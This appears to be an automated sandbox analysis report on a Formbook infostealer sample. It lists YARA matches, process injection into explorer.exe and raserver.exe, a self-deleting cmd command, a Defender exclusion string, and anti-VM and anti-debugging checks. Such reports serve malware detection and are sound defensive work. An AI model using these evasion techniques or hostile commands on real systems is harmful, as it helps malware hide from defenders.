            Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: hvEop8Y70Y.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@12/7
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hvEop8Y70Y.exe.log
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Mutant created: \Sessions\1\BaseNamedObjects\TItEGneTqYuzerdV
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: hvEop8Y70Y.exe | Virustotal: Detection: 25%
            Source: hvEop8Y70Y.exe | ReversingLabs: Detection: 29%
            Source: unknown | Process created: C:\Users\user\Desktop\hvEop8Y70Y.exe 'C:\Users\user\Desktop\hvEop8Y70Y.exe'
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Process created: C:\Users\user\Desktop\hvEop8Y70Y.exe C:\Users\user\Desktop\hvEop8Y70Y.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\hvEop8Y70Y.exe'
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: hvEop8Y70Y.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: hvEop8Y70Y.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: hvEop8Y70Y.exe, 00000004.00000002.312279182.00000000014B0000.00000040.00000001.sdmp, raserver.exe, 0000000E.00000002.509423103.000000000459F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: hvEop8Y70Y.exe, raserver.exe
            Source: Binary string: RAServer.pdb source: hvEop8Y70Y.exe, 00000004.00000002.312209416.0000000001440000.00000040.00000001.sdmp
            Source: Binary string: RAServer.pdbGCTL source: hvEop8Y70Y.exe, 00000004.00000002.312209416.0000000001440000.00000040.00000001.sdmp
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 0_2_008BDC80 push 00000000h; iretd
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 0_2_008BD65F push es; retn 0001h
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 0_2_075D4B4C push esp; retf
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 0_2_075D6A3A pushad ; ret
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 0_2_075D39FB push ss; iretd
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_004152F5 push esi; retf
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0041536A push esi; retf
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0041B3F2 push eax; ret
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0041B3FB push eax; ret
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0041B3A5 push eax; ret
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0041B45C push eax; ret
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_009ADC4E push 00000000h; iretd
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_009AD65F push es; retn 0001h
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0152D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 14_2_044FD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 14_2_003952F5 push esi; retf
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 14_2_0039536A push esi; retf
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 14_2_0039B3A5 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 14_2_0039B3FB push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 14_2_0039B3F2 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 14_2_0039B45C push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exe | Code function: 14_2_0039BDAE push esp; iretd
            Source: initial sample | Static PE information: section name: .text entropy: 7.60713416041
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\raserver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match | File source: 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: hvEop8Y70Y.exe PID: 6364, type: MEMORY
            Source: Yara match | File source: 0.2.hvEop8Y70Y.exe.2f43d44.1.raw.unpack, type: UNPACKEDPE
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 00000000003885E4 second address: 00000000003885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 000000000038896E second address: 0000000000388974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe TID: 6368 | Thread sleep time: -104479s >= -30000s
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe TID: 6428 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe TID: 6636 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1100 | Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\SysWOW64\raserver.exe TID: 6636 | Thread sleep time: -44000s >= -30000s
            Source: C:\Windows\explorer.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\raserver.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Thread delayed: delay time: 104479
            Source: explorer.exe, 00000005.00000000.287635798.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
            Source: explorer.exe, 00000005.00000000.266107364.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000002.512951288.0000000003710000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.286652436.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: vmware
            Source: explorer.exe, 00000005.00000002.513145785.0000000003767000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: VMWARE
            Source: explorer.exe, 00000005.00000002.506081202.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000005.00000000.287710700.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000005.00000000.279837989.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000005.00000000.286652436.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000005.00000000.286652436.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 00000005.00000000.287710700.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: explorer.exe, 00000005.00000000.286652436.0000000008270000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\raserver.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_00409B10 LdrLoadDll,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014FB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014DC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014DB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014D9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0150513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014F4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015641E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_01502990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014FC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0150A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015061A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015569A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014F0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_01592073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015A1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_01557016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015A4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014EB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0150002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0156B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014D58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014D9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_01553884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0150F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0150F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015190AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015A8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014DDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014DF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_01503B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014DDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0159131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015553CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014FDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0150B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014E1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_01502397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0159138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0158D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_01504BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015A5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_01564257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0159EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0151927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0158B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_015A8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014E8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0159AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014F3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014DAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014D5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014D5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_01514A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_01502ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_01502AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0150D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_0150FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_014EAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4_2_01513D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01553540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014FC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0155A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01504D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01504D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01504D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A8D34 mov eax, dword ptr fs:[00000030h]
